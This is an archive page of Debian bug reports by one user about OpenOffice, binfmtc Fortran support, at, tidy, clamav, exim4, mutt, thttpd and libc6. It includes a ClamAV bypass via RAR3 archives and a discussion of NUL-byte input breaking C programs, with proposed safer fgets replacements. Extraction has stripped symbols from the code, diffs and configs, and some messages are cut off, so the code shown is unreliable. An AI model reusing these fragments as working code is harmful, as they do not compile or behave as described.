2009-05-27 Thread Andrew Buckeridge
Package: openoffice.org-common
Version: 1:2.4.1+dfsg-1

On Wed, 27 May 2009 09:18:42 +0200
Rene Engelhard r...@debian.org wrote:

 retitle 342628 Can't resize window under twm or xfwm4 without 
 Andrew Buckeridge wrote:
  openoffice.org-gtk does not fix the resize issue in twm.
 of course not. -gtk does not have an effect itself on non-GNOME (Xfce
 is an exception because it somehow matches GNOME :) ) DEs/WMs.
 When you want Gtk UI etc. in twm to check whether that helps,
 export OOO_FORCE_DESKTOP=gnome and/or SAL_USE_VCLPLUGIN=gtk.

$ sudo apt-get install openoffice.org-gtk
$ # an each way bet
$ export OOO_FORCE_DESKTOP=gnome
$ export SAL_USE_VCLPLUGIN=gtk
$ openoffice 

It does help a lot, thanks.

It looks like it needs to depend on openoffice.org-gtk (and the
environment vars) or a particular WM.

The bug was originally posted against openoffice.org as it was with a
specific version running under a particular twm which was more or less
stable. Twm has been part of X11 for while so should be a stable WM.
  .''`.  René Engelhard -- Debian GNU/Linux Developer
  : :' : http://www.debian.org | http://people.debian.org/~rene/
  `. `'  r...@debian.org | GnuPG-Key ID: 248AEB73
`-   Fingerprint: 41FA F208 28D4 7CA5 19BB  7AD9 F859 90B0 248A EB73

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Bug#522803: Can still be useful

2009-04-15 Thread Andrew Buckeridge
Package: dsbltesters
Version: 0.9.5-3

I have got it to target spamt...@bgcaus.com which should be pretty
obvious what that email does. I do not look for signature in body.
Too bad if hit that mailbox.

In my /etc/dsbl.conf I now have


As it is my own blacklist I can catch backscatter DSN spam.

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Bug#522803: Can still be useful

2009-04-15 Thread Andrew Buckeridge
Package: dsbltesters
Version: 0.9.5-3

If I was not asleep.

In my /etc/dsbl.conf I now have

# backscatter relay

# other relay

As it is my own blacklist I can catch backscatter DSN spam.

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Bug#522803: DSBL is GONE

2009-04-06 Thread Andrew Buckeridge
Package: dsbltesters
Version: 0.9.5-3


 DSBL is GONE and highly unlikely to return. Please remove it from your
 mail server configuration.

The relay target lis...@dsbl.org is still hard coded.

When I try to connect to SMTP I get: -

 ** 421 shelob.surriel.com: Too many concurrent SMTP connections; please try 
 again later
  - QUIT

So new info is not being collected.

This was very effective until dsbl.org broke. Now that the database is
empty and not being maintained it is not much use. Is it going to be
used for a new database later?

I was very tempted to do

# Clinet Variables ##
# Username and domain to send as (bounces will go here)

but didn't.

This could catch backscatter where message body with relay test
signature is relayed, but that was not what was intended. This
could however be a new feature if dsbltesters is revived.

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Bug#518893: Lost gfortran and f95 support regression

2009-03-22 Thread Andrew Buckeridge
Package: binfmtc
Version: 0.15-1

On Sun, 22 Mar 2009 20:59:38 +0900
Junichi Uekawa dan...@netfort.gr.jp wrote:

 You mentioned in a private email that you mis-filed the version, that
 this bug is already fixed in 0.16 and you found it against 0.15. Can
 you verify?

Yes, should have been 0.15-1.

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Bug#518938: Does not convert from HTML to Word

2009-03-09 Thread Andrew Buckeridge
Package: unoconv
Version: 0.3-3

It can convert HTML to PDF, but HTML to Word or RTF fails.

unoconv -v -d document -f doc DRAFT.html

In the resulting DRAFT.doc the images are not visible.

In using openoffice.org by hand you can not just open the HTML and then
save as MS Word. This may be a clue.

To convert HTML to Word by hand you need to: -
File/New/Text Document;
Insert/File the HTML; and then
File/Save As/Microsoft Word ...

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Bug#518893: Lost gfortran and f95 support regression

2009-03-08 Thread Andrew Buckeridge
Package: binfmtc
Version: 0.16-1

It had Fortran 95 support for a while, but now it has gone.

The problem with the magic c BINFMTF: is that 'c' is not in the
Old Fortran character set
but neither is ':' or the compiler options. Porting back to the
Old Fortran character set would be unlikely anyway.

The interpreter looks for g77 which is no longer available.
You may as well get rid of c BINFMTF: and support for g77.

In Old Fortran you could use '*' or 'C' in first column for a comment.

In Fortran 95 comments start with '!'.

In my earlier patch I recommended the magic ! BINFMTF95: and the
interpreter used gfortran.

You could use the shorter ! BINFMTF: if it is not being reserved for
g95 -std=F use. 

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Bug#472960: Won't use OpenOffice.org due to context sensitive popup menus

2009-03-02 Thread Andrew Buckeridge
Package: openoffice.org-core
Version: 1:2.4.1-17

Popup or on screen context menus make the Writer application pretty much
unusable. My automatic response to any pop-up is to throw a skull and
cross bones cursor at it. Then next time I run OpenOffice.org it does
its file recovery dialog.

When editing all you want to see change in a wysiwyg is the document
you are changing. This could be achieved via a context sensitive menu
path that could be assigned a keyboard shortcut key.

I will attempt to register this upstream with

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Bug#515262: POSIX at(1) referring to touch(1) which has one second resolution is odd

2009-02-16 Thread Andrew Buckeridge
Package: at
Version: 3.1.10
Severity: whishlist

Having one second resolution for touch(1) makes sense as file system
time stamps must support this. See also utime(3), utime.h(7), stat(3)
and stat.h(7) POSIX man pages. With at(1), however we only want minute

I.e. it is really just at -t [[CC]YY]MMDDhhmm we want for non confusing

We could ignore [.SS], require it be .00 if used or use it even
though not significant in terms of our time resolution which will mean
that it is effectively ignored anyway.

Ignoring the [.SS] would seem most POSIX compatible.

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Bug#515262: at lacks POSIX -t [[CC]YY]MMDDhhmm[.SS] option

2009-02-15 Thread Andrew Buckeridge
Package: at
Version: 3.1.10
Severity: whishlist

at -t 02201400
Got at: invalid option -- t

Says garbled time if 02201400 used without the -t option.

at 14:00 20 Feb
did work and gave
job 40 at Fri Feb 20 14:00:00 2009

Good thing as there is no way English speakers would use a
middle-endian date.

The POSIX -t option allows for an unambiguous numerical big-endian date.

POSIX man page for at has:

at [-m][-f file][-q queuename] -t time_arg

-t  time_arg
   Submit  the  job  to  be  run  at the time specified by the time
   option-argument, which the application shall ensure has the for-
   mat as specified by the touch -t time utility.

POSIX man page for touch has:

-t  time
   Use  the specified time instead of the current time. The option-
   argument shall be a decimal number of the form:

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Bug#419547: batch accepts commands from standard input

2009-02-15 Thread Andrew Buckeridge
Package: at
Version: 3.1.10

The POSIX batch has no parameters. It not useless as it can accept
commands from standard input. The batch accepts no parameters
response will ensure scripts are portable.

batch __
# List your jobs here


The  batch utility shall read commands from standard input and schedule
them for execution in a batch queue. It shall be the equivalent of  the
   at -q b -m now
where queue b is a special at queue, specifically for batch jobs. Batch
jobs shall be submitted to the batch queue with no time constraints and
shall  be run by the system using algorithms, based on unspecified fac-
tors, that may vary with each invocation of batch.

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Bug#506394: Fixed in testing

2008-11-21 Thread Andrew Buckeridge
Package: tidy
Version: 20080116cvs-2

Manual page tidy(1) now says:
-ascii use ISO-8859-1 for input, US-ASCII for output
   use ISO-8859-15 for input, US-ASCII for output
   use ISO-8859-1 for both input and output

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Bug#506394: ISO-8859-15 support with -latin0 is undocumented in man page

2008-11-20 Thread Andrew Buckeridge
Package: tidy
Version: 20051018-1

Manual page tidy(1) says:

-ascii use US-ASCII for output, ISO-8859-1 for input
   use US-ASCII for output, ISO-8859-1 for input
   use ISO-8859-1 for both input and output

The -latin0 option should say:

-ascii use US-ASCII for output, ISO-8859-1 for input
   use US-ASCII for output, ISO-8859-15 for input
   use ISO-8859-1 for both input and output

For example it can be used to convert UTF-8 to 7bit clean US-ASCII with
Euro support:

 iconv -c -f UTF-8 -t ISO-8859-15 | tidy -b -latin0 -

This would not handle Euro, but would handle vulgar fractions:

 iconv -c -f UTF-8 -t ISO-8859-1 | tidy -b -ascii -

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Bug#506398: Tidy has a non-zero exit status when successful

2008-11-20 Thread Andrew Buckeridge
Package: tidy
Version: 20051018-1
Severity: whishlist

Tidy will throw some warnings, but still produce output.
When it throws these warnings it has a non-zero exit status.
This makes it difficult to use in a Makefile.

A work around is to test the target file size with: -

test -s $(@)

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Bug#484670: RAR 3 encoding circumvents clamav

2008-11-06 Thread Andrew Buckeridge
Package: clamav
Version:  0.90.1dfsg-3.1+etch14
Severity: grave

Suggests: unrar (= 3.0-1) which is non-free. I have non-free unrar
installed anyway, but it appears that it is not being used.

Bug #484642 had this as normal.
Bug #484670 has this as grave.

Though not security issue for system itself it makes the package
useless and thus is a security issue for systems that would otherwise
be protected.

With ArchiveBlockEncrypted true in my clamd.conf I expected a non
zero status for files than can not be decoded. This is not the case.

 bash-3.1# clamdscan *.rar; echo $?
 /etc/clamav/license.txt.rar: OK
 Infected files: 0
 Time: 0.002 sec (0 m 0 s)

 bash-3.1# clamscan *.rar; echo $?
 LibClamAV Warning: RAR code not compiled-in
 license.txt.rar: OK
 Known viruses: 458539
 Engine version: 0.94
 Scanned directories: 0
 Scanned files: 1
 Infected files: 0
 Data scanned: 0.00 MB
 Time: 3.235 sec (0 m 3 s)

ZIP ... improving virus operational efficiency by reducing the number of
steps needed to process data.

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Bug#500912: It works

2008-10-07 Thread Andrew Buckeridge
Package: binfmtc
Version: 0.16-1

Thanks for the new one card trick.
Ready to close?

Cleaned out config. Built and installed .deb.
That all important hello program worked.
Gfortran accepts old Fortan too.

$ ./hello.f95
Hello, world!
$ cat hello.f95
! BINFMTF95: -O -Wuninitialized -Werror -pedantic-errors
   IMPLICIT NONE! Conform to Mil Std 1753

   WRITE(*,'(A)') 'Hello, world!'


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Bug#500912: Changed default options back to -O2 -Wall and fixed man page to match

2008-10-04 Thread Andrew Buckeridge
Package: binfmtc
Version: 0.15-1
Severity: wishlist

File magic was wrong in my version of manpage.
Changed references to C in source and compiler to Fortran.
Changed options back to  -O2 -Wall  to match the rest.

You need to balance compile time with run time.
Is -O2 wise?

You need at least -O for some of the important compile time checks so
-O may be a better option.

These can be given after magic so could also be empty.

 *  binfmt_misc C Interpreter
 *  Copyright (C) 2005 Junichi Uekawa
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  GNU General Public License for more details.
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 * Fortran bindings.
#include stdio.h
#include stdlib.h
#include binfmtc.h

const char* gcc_x =  -x f95 ;
const char* language_type = Fortran 95;
const char* binfmtc_magic=! BINFMTF95:;

const char* compiler_name(void)
  return  getenv(GFORTRAN)?:

const char* default_options(void)
  return getenv(BINFMTC_GFORTRAN_OPTS)?:
 -O2 -Wall ;

.TH binfmtf 1 2005 Jun 4 binfmt_misc Dancer binfmt_C
binfmtf-interpreter \- binfmt_misc fortran handler
.BI binfmtf-interpreter  fortran-source-file-name  [ command-line opions 
... ]
.B binfmtf-interpreter
compiles a fortran source file specified on the command-line using 
the gfortran compiler, and executes the resulting file.

It is designed to be used as a handler for 
.B binfmt_misc
handler, which is a system used in Linux for handling arbitrary files 
as executables.

The command-line options are passed on to the 
compiled binary.


There is a requirement for Fortran source files to have the 
magic characters
at the beginning of the file.

That line also is used to specify the additional command-line options
for Fortran compiler.

The compiler used.
The default is to use
.B gfortran


Temporary directory used for binary and execution.

Falls back to 
.B /tmp

enables debug output if set.

Additional Gfortran options.
to verify the options being passed on to gfortran.

The default is
.B  -O2 -Wall 

Junichi Uekawa ([EMAIL PROTECTED])

Upstream page is available at 
.B http://www.netfort.gr.jp/~dancer/software/;

.BR binfmtc-interpreter (1),  
.BR binfmtcxx-interpreter (1),  
.BR binfmtgcj-interpreter (1),  
.BR binfmtasm-interpreter (1) 

Bug#500912: Add Fortran 95 support using gfortran

2008-10-02 Thread Andrew Buckeridge
Package: binfmtc
Version: 0.15-1
Severity: wishlist

G77 is not available in lenny.

Gfortran does Fortran 95 and is available.

You can work around the hard coded compiler with
ln -s `which gfortran` /usr/local/bin/g77
export G77=`which gfortran`
but the hard coded magic starts with 'c' rather than '!'.

Fortran 95 comments start with '!' rather than
'c' or some times 'C' in the first column.

I have changed switches in the diff to the ones I need in C.
You may want to change them back.
diff -Nur binfmtc-0.15/Makefile.am binfmtc_0.15.local/Makefile.am
--- binfmtc-0.15/Makefile.am	2007-07-14 17:05:24.0 +0800
+++ binfmtc_0.15.local/Makefile.am	2008-10-02 21:50:47.0 +0800
@@ -1,5 +1,6 @@
 bin_PROGRAMS=binfmtc-interpreter \
 	binfmtf-interpreter \
+	binfmtf95-interpreter \
 	binfmtp-interpreter \
 	binfmtcxx-interpreter \
 	binfmtasm-interpreter \
@@ -8,6 +9,7 @@
 binfmtcxx_interpreter_SOURCES=binfmtc-interpreter.c binfmtc-lang-cxx.c binfmtc.h
 binfmtc_interpreter_SOURCES=binfmtc-interpreter.c binfmtc-lang-c.c binfmtc.h
 binfmtf_interpreter_SOURCES=binfmtc-interpreter.c binfmtc-lang-f.c binfmtc.h
+binfmtf95_interpreter_SOURCES=binfmtc-interpreter.c binfmtc-lang-f95.c binfmtc.h
 binfmtp_interpreter_SOURCES=binfmtc-interpreter.c binfmtc-lang-p.c binfmtc.h
 binfmtasm_interpreter_SOURCES=binfmtc-interpreter.c binfmtc-lang-asm.c binfmtc.h
 binfmtgcj_interpreter_SOURCES=binfmtc-interpreter.c binfmtc-lang-gcj.c binfmtc.h
@@ -31,6 +33,7 @@
 dist_man_MANS= binfmtc-interpreter.1 binfmtcxx-interpreter.1 realcsh.c.1 binfmtasm-interpreter.1 \
 	binfmtf-interpreter.1 \
+	binfmtf95-interpreter.1 \
 	binfmtp-interpreter.1 \
 	binfmtgcj-interpreter.1 \
 	realksh.c.8 \
diff -Nur binfmtc-0.15/Makefile.in binfmtc_0.15.local/Makefile.in
--- binfmtc-0.15/Makefile.in	2007-09-02 10:02:44.0 +0800
+++ binfmtc_0.15.local/Makefile.in	2008-10-02 21:56:12.0 +0800
@@ -36,9 +36,9 @@
 bin_PROGRAMS = binfmtc-interpreter$(EXEEXT) \
-	binfmtf-interpreter$(EXEEXT) binfmtp-interpreter$(EXEEXT) \
-	binfmtcxx-interpreter$(EXEEXT) binfmtasm-interpreter$(EXEEXT) \
-	binfmtgcj-interpreter$(EXEEXT)
+	binfmtf-interpreter$(EXEEXT) binfmtf95-interpreter$(EXEEXT) \
+	binfmtp-interpreter$(EXEEXT) binfmtcxx-interpreter$(EXEEXT) \
+	binfmtasm-interpreter$(EXEEXT) binfmtgcj-interpreter$(EXEEXT)
 subdir = .
 DIST_COMMON = README $(am__configure_deps) $(dist_bin_SCRIPTS) \
 	$(dist_man_MANS) $(dist_sbin_SCRIPTS) $(srcdir)/Makefile.am \
@@ -75,6 +75,10 @@
 binfmtf_interpreter_OBJECTS = $(am_binfmtf_interpreter_OBJECTS)
 binfmtf_interpreter_LDADD = $(LDADD)
+am_binfmtf95_interpreter_OBJECTS = binfmtc-interpreter.$(OBJEXT) \
+	binfmtc-lang-f95.$(OBJEXT)
+binfmtf95_interpreter_OBJECTS = $(am_binfmtf95_interpreter_OBJECTS)
+binfmtf95_interpreter_LDADD = $(LDADD)
 am_binfmtgcj_interpreter_OBJECTS = binfmtc-interpreter.$(OBJEXT) \
 binfmtgcj_interpreter_OBJECTS = $(am_binfmtgcj_interpreter_OBJECTS)
@@ -97,12 +101,14 @@
 	$(binfmtc_interpreter_SOURCES) \
 	$(binfmtcxx_interpreter_SOURCES) \
 	$(binfmtf_interpreter_SOURCES) \
+	$(binfmtf95_interpreter_SOURCES) \
 	$(binfmtgcj_interpreter_SOURCES) \
 DIST_SOURCES = $(binfmtasm_interpreter_SOURCES) \
 	$(binfmtc_interpreter_SOURCES) \
 	$(binfmtcxx_interpreter_SOURCES) \
 	$(binfmtf_interpreter_SOURCES) \
+	$(binfmtf95_interpreter_SOURCES) \
 	$(binfmtgcj_interpreter_SOURCES) \
 man1dir = $(mandir)/man1
@@ -212,6 +218,7 @@
 binfmtcxx_interpreter_SOURCES = binfmtc-interpreter.c binfmtc-lang-cxx.c binfmtc.h
 binfmtc_interpreter_SOURCES = binfmtc-interpreter.c binfmtc-lang-c.c binfmtc.h
 binfmtf_interpreter_SOURCES = binfmtc-interpreter.c binfmtc-lang-f.c binfmtc.h
+binfmtf95_interpreter_SOURCES = binfmtc-interpreter.c binfmtc-lang-f95.c binfmtc.h
 binfmtp_interpreter_SOURCES = binfmtc-interpreter.c binfmtc-lang-p.c binfmtc.h
 binfmtasm_interpreter_SOURCES = binfmtc-interpreter.c binfmtc-lang-asm.c binfmtc.h
 binfmtgcj_interpreter_SOURCES = binfmtc-interpreter.c binfmtc-lang-gcj.c binfmtc.h
@@ -234,6 +241,7 @@
 dist_man_MANS = binfmtc-interpreter.1 binfmtcxx-interpreter.1 realcsh.c.1 binfmtasm-interpreter.1 \
 	binfmtf-interpreter.1 \
+	binfmtf95-interpreter.1 \
 	binfmtp-interpreter.1 \
 	binfmtgcj-interpreter.1 \
 	realksh.c.8 \
@@ -352,6 +360,9 @@
 binfmtf-interpreter$(EXEEXT): $(binfmtf_interpreter_OBJECTS) $(binfmtf_interpreter_DEPENDENCIES) 
 	@rm -f binfmtf-interpreter$(EXEEXT)
 	$(LINK) $(binfmtf_interpreter_LDFLAGS) $(binfmtf_interpreter_OBJECTS) $(binfmtf_interpreter_LDADD) $(LIBS)
+binfmtf95-interpreter$(EXEEXT): $(binfmtf95_interpreter_OBJECTS) $(binfmtf95_interpreter_DEPENDENCIES) 
+	@rm -f binfmtf95-interpreter$(EXEEXT)
+	$(LINK) $(binfmtf95_interpreter_LDFLAGS) $(binfmtf95_interpreter_OBJECTS) $(binfmtf95_interpreter_LDADD) $(LIBS)
 binfmtgcj-interpreter$(EXEEXT): $(binfmtgcj_interpreter_OBJECTS) 

Bug#491853: mutt lacks plain and login for smtp auth

2008-07-22 Thread Andrew Buckeridge
Package: mutt
Version: 1.5.18-2
Severity: whishlist

set smtp_authenticators=plain:login does not work

I am using TLS to protect plain and login auth as passwords are via
LDAP. Mutt seems to be able to use plain and login for IMAP, but not
SMTP. Only a few users are in the separate plaint text database
required for CRAM-MD5 AUTHentication.

I am using exim4-daemon-heavy with libpam-ldap.

mutt -d 5 output

 Using default SMTP port 25
 Connected to on fd=6

Only certain accounts without TLS. Using this could allow meet in the
middle as mail will be put in Sent folder on IMAP via TLS.

 6 220 n50.bgcaus.com SMTP Only; Tue, 22 Jul 2008 20:59:43 +0800; (NO 
 UCE/UBE. UCE POLICY AT http://www.bgc.com.au/s_11/11_ipdomainuse.cgi C=AU 
 L=WA) Logging access from: []
 6 EHLO thot.cvale.bgc.com.au^M
 6 250-n50.bgcaus.com Hello 
 6 250-SIZE 1
 6 250-8BITMIME
 6 250 HELP

With TLS PLAIN and LOGIN any LDAP user can AUTHenticate, but we don't
have PLAIN or LOGIN.

 6 220 TLS go ahead
 6 EHLO thot.cvale.bgc.com.au^M
 6 250-n50.bgcaus.com Hello 
 6 250-SIZE 1
 6 250-8BITMIME
 6 250 HELP
 SASL local ip:;39897, remote ip:;25
 External SSF: 128
 External authentication name: andrewb
 SASL: No worthy mechs found
 smtp_auth_sasl:  unavailable
 No authenticators available

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#491873: SMTP protocol synchronization error with TLS on exim4

2008-07-22 Thread Andrew Buckeridge
Package: ssmtp
Version: 2.62-1
Severity: whishlist

Ssmtp works with exim4 without TLS. When I STARTTLS to protect AUTH
Exim4 rejects the connection.

Can use cram-md5 with users in the separate plaint text database.

In my exim4-daemon-heavy mainlog I have: -

 2008-07-22 21:47:07 SMTP protocol synchronization error (input sent without 
 waiting for greeting): rejected connection from
H= [] input=\026\003

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#446131: closed by Ricardo Mones [EMAIL PROTECTED] (Re: Bug#446131: When I change attachment Properties dialog is behind Compose window)

2008-06-17 Thread Andrew Buckeridge
Package: sylpheed
Version: 2.5.0~beta3-1

Not a WM issue, but a Sylpheed-Gtk one.
It can be reproduced with a number of more stable WMs.
Perhaps I need to use a non-Gtk mail client with a non-Gtk WM.

On Mon, 16 Jun 2008 08:31:19 +
[EMAIL PROTECTED] (Debian Bug Tracking System) wrote:

 This is an automatic notification regarding your Bug report
 which was filed against the sylpheed package:
 #446131: When I change attachment Properties dialog is behind Compose window
 It has been closed by Ricardo Mones [EMAIL PROTECTED].
 Their explanation is attached below along with your original report.
 If this explanation is unsatisfactory and you have not received a
 better one in a separate message then please contact Ricardo Mones [EMAIL 
 replying to this email.
 446131: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=446131
 Debian Bug Tracking System
 Contact [EMAIL PROTECTED] with problems

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#446131: Focus works with -gtk1 version

2008-06-17 Thread Andrew Buckeridge
Focus and raise have been separate in X11 and Twm.
This allows me to work with several windows in just one screen.

The sylpheed-gtk1_1.0.6-6 package raises the focused window.

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#481081: Maildir appendfile names longer than they need to be

2008-05-13 Thread Andrew Buckeridge
Package: exim4
Version: 4.69-2
Severity: wishlist

In ~/Maildir/cur/ I have: -
   ^^^   ^^

The Microseconds should start with M.  (Some one needs another X font or
glasses?  Phil, like the old 4.3 code and child.c in particular as this
alone could justify keeping vfork() in Linux.)

The POSIX functions gettimeofday() and getpid() should suffice.

The bit after the second '.' should be from the POSIX gethostname() as
this is short, but unique in an NFS LAN context.  (Replace / with \057
and : with \072.  Also be mindful to replace ' ' with \040 to address
bug #446161.)

The file name and UIDL are longer than they need to be to be unique.
I think that this is a waste of resources.  (If you agree then report
upstream as I their bugzilla has not answered me.)

See Linux man page open(2) and O_EXCL NFSv2 and Linux 2.6.

Maildir as far as MTA delivery is concerned is described in: -
Unless you are doing something odd with TURN or ETRN plain old
Maildir should suffice.

Functions gettimeofday(), getpid() and gethostname() are POSIX
or SUSv3 so this should be independent of target.  (We really
don't need to care about non-conforming targets do we?)

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#480244: X cursor gone

2008-05-08 Thread Andrew Buckeridge
Package: xserver-xorg-video-ati
Version: 1:6.8.0-1

Architecture: powerpc

After upgrading xserver-xorg-video-ati from 1:6.6.3-2 to 1:6.8.0-1 my X
cursor changed from  to .  I.e. left and right appear swapped.
The arrow now points from the bottom left to centre of the top of
cursor box.  Some of the arrow is just visible on right hand side of
the cursor box.

|/ | \|
|\ | /|

| ^|  | ^
|/ |  |/

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#477194: Get this in 4.69-2+b1 too

2008-05-06 Thread Andrew Buckeridge
Package: exim4-base
Version: 4.69-2+b1

Own script starts with
/usr/sbin/exim4 -bd -C /etc/exim4/exim4.conf
as using local exim4.conf

Selecting previously deselected package exim4-config.
(Reading database ... 213415 files and directories currently installed.)
Unpacking exim4-config (from .../exim4-config_4.69-2_all.deb) ...
Selecting previously deselected package exim4-base.
Unpacking exim4-base (from .../exim4-base_4.69-2+b1_powerpc.deb) ...
Selecting previously deselected package exim4-daemon-heavy.
Unpacking exim4-daemon-heavy (from 
.../exim4-daemon-heavy_4.69-2+b1_powerpc.deb) ...
Setting up exim4-config (4.69-2) ...
Setting up exim4-base (4.69-2+b1) ...
Setting up exim4-daemon-heavy (4.69-2+b1) ...
Starting MTA:exim: incompatible command-line options or arguments
invoke-rc.d: initscript exim4, action start failed.
dpkg: error processing exim4-daemon-heavy (--configure):
 subprocess post-installation script returned error exit status 1
Errors were encountered while processing:
E: Sub-process /usr/bin/dpkg returned an error code (1)

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#255493: User starting with a capital is more secure

2008-05-06 Thread Andrew Buckeridge
Package: exim4
Version: 4.69-2

As SMTP requires that local_part be case insensitive it is squashed by

The account Debian-exim starts with a capital.  This stops remote from
getting at it via email.

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#477194: Fixed in 4.69-5+b1

2008-05-06 Thread Andrew Buckeridge
Package: exim4-base
Version: 4.69-5+b1

[EMAIL PROTECTED]:~# /etc/init.d/exim4 start
Starting MTA: exim4.
[EMAIL PROTECTED]:~# ps $(/var/run/exim4/exim.pid)
26441 ?Ss 0:00 /usr/sbin/exim4 -bd -q30m

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#475599: Maybe a small error in stunnel4 init script

2008-05-02 Thread Andrew Buckeridge
Package: stunnel4
Version: 3:4.18-2

Just needs a warning that it will not start because it has not been
enabled. It should tell user to change /etc/default/stunnel4 as with
other scripts.  If default config has risks then this is a good idea to
enable user to review config before it starts.

For example spamassassin also requires ENABLED=1 to start, but gives a
warning: -

if [ $ENABLED = 0 ]; then
echo $DESC: disabled, see /etc/default/spamassassin
exit 0

with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#465065: thttpd work with dwww

2008-02-10 Thread Andrew Buckeridge
Package: thttpd
Version: 2.25b-4

www requires cgi-bin.  In Debian this is in /usr/lib/cgi-bin. Thttd
followed symlink for cgi-bin, but did not work for virtual documents
within the CGI.

 lrwxrwxrwx 1 root root 16 2006-11-11 13:04 /var/www/cgi-bin - 

Following symlinks would be correct behaviour as it is more UNIXey than
having a directory or script alias.  Security can be provided by only
accepting connections if it is running as www-data.

I even tried cgipat=** which I would expect to obey the file execute
permissions as www-data in the usual UNIX way.

The original nosymlinkcheck config option now throws an error.
The -nos option and the new nosymlink and nosymlinks config options
are not working properly with CGIs.

example output attached.

I can still use http://localhost/cgi-bin/man/man2html
and http://localhost/cgi-bin/info2www

Is a '/' after the CGI okay?

I think I had dwww working in #208471

Title: 403 Forbidden

403 Forbidden
The requested URL '/cgi-bin/dwww/usr/share/man/man1/gcc-4.3.1.gz?type=man' resolves to a file outside the permitted web server directory tree.

thttpd/2.25b 29dec2003

Bug#451886: fgets() and poison NULL byte attacks (aka NULL escapes)

2007-11-18 Thread Andrew Buckeridge
package: libc6
version: 2.3.6.ds1-13etch2
severity: wishlist

Possible partial fix for fgets and alternatives.

Bug #57729 is marked as done.  It could be fixed for real.
I have found null escapes a pretty reliable way of breaking many C
programs including various editors.

The standard C stdio.h fgets function is just plain wrong.

fputs stops at a '\0', but fgets may only stop at '\n' even if a '\0'
is encountered.  There is no way of knowing how much is read by fgets.
These functions are inconsistent and are not binary safe.

The standard should be fixed.

In fcat2.c I add a function int fngets(char *s, int size, FILE *stream);
which has similar functionality to GNU getline.  This can be used with
fwrite.  As fngets does not exist it could be added by any stdio.h
user and will be portable.

In fcat.c I simply fix the broken fputs function in such a way that it
should not break existing use.  I also suggest some macros to check the
stdio.h buffer so that more efficient unistd.h can be mixed, even
though POSIX makes it clear that this should not be done.

How many extra CPU cycles to match '\n' or '\0' rather than just
match '\n' in the library fgets functions?

I give ESMTP as an example of a new line matching problem as this often
uses stdio.h and is often exploited by remote.  Many other
applications match new lines and could also be fed '\0's by remote.

Trivial examples attached.  These are not thread safe.
/*BINFMTC: -O -Wuninitialized -Werror -pedantic-errors

Binary safe stdio.h functions.

fputs stops at a '\0', but fgets may only stop at a '\n'.
These functions are inconsistenat and are not binary safe.

fgets could be made binary safe without breaking existing applications,
but its safe use would be inefficient.  See exaample fcat.c.

 $ gcc -o fcat2.out fcat2.c
 $ ./fcat2.out fcat2.out fcat2.out2
 $ cmp fcat2.out*

Define fngets and fnputs.  These functions use stdio.h, still store a
null '\0', however they read past null '\0' and return the number read
or written.

#define _GNU_SOURCE
#include stdio.h
#include string.h
#include errno.h

/* returns size_t of number written */
#define fnputs(x,y,z) fwrite_unlocked((x),1,(y),(z))

/* Reads size-1 characters up to \n including any \0 cf. getline */
int fngets(char *s, int size, FILE *stream)
	char *p;
	int c;

	while(--size0(c=getc_unlocked(stream))!=EOF) {
		if (c=='\n') { /* Will read '\0'. */
	*p='\0'; /* Always mark the end. */
	if(c==EOF) { /* Expected. */
		if(feof_unlocked(stream)) {
			if(p==s) {
return -1;
		} else {
			return -1;
	return p-s; /* Return something meaningful. */

/* fdopen of TCP_NODELAY SO_KEEPALIVE socket 
   call fflush for continuation lines teergrube from hell */

int main() {
	char b[1024];
	int i;

	/*(void)setvbuf(stdout,(char *)NULL,_IOLBF,0);*/
	/*setlinebuf(stdout);*/ /* before fprintf(stderr,...) */

	while((i=fngets(b,1024,stdin))0) {
		(void)fprintf(stderr,Got %d bytes.\n,i);
		(void)fprintf(stderr,Put %u bytes.\n,\
		(void)fflush(stdout); /* after fprintf(stderr,...) */

	return 0;

/*BINFMTC: -O -Wuninitialized -Werror -pedantic-errors

We often need new line matching, but the peer may have sent additional
information after the new line so we can not use the light weight read.

POSIX has adopted the stdio.h functions such as fgets which match new

The problem with UNIX/POSIX/IEEE/ISO fgets definition is that it may not
necessarily be binary safe.  This should really be fixed in a way that
is compatible with existing POSIX applications.

Bug #57729 says use non POSIX getline GNU extension which returns length
rather than the infamous pointer. (dietlibc: What were they smoking?)

The function libc6 fgets_unlocked has read past the '\0' and there is no
easy way to find how much has been read.

 $ gcc -o fcat.out fcat.c
 $ ./fcat.out fcat.out fcat.out2
 $ cmp fcat.out*
 fcat.out fcat.out2 differ: byte 9, line 1

The Linux manpage for fgets(3) says: -

 fgets() reads in at most one less than size characters from stream  and
 stores  them  into  the buffer pointed to by s.  Reading stops after an
 EOF or a newline.  If a newline is read, it is stored into the buffer.
 A '\0' is stored after the last character in the buffer.

It does not say that reading should stop at a '\0'.

The behaviour of fgets in the POSIX manpage is also unclear if fgets
reads a '\0'.

UTF-16 could be used with C99 wcslen which matches L'\0', but UTF-16 is
inefficient even for Asian languages so it should not be used.

ESMTP 8BITMIME is fine for ISO-8859-15 which does not contain '\0' or
control characters, but it is already misused with other character sets so
if 8BITMIME is implemented then it should be made binary safe.  So long as
the MUA ensures that messages including binary ones have a \n.\r\n to
terminate the message.  This could be done by matching new lines and then

Alternatively a way of mixing stdio.h and unistd.h 

Bug#444020: Did not have problem when I installed from source pkg

2007-11-14 Thread Andrew Buckeridge
Package: open-cobol
Version: 0.33~cvs20070616-1

 apt-get source open-cobol
 cd open-cobol-0.33~cvs20070616/
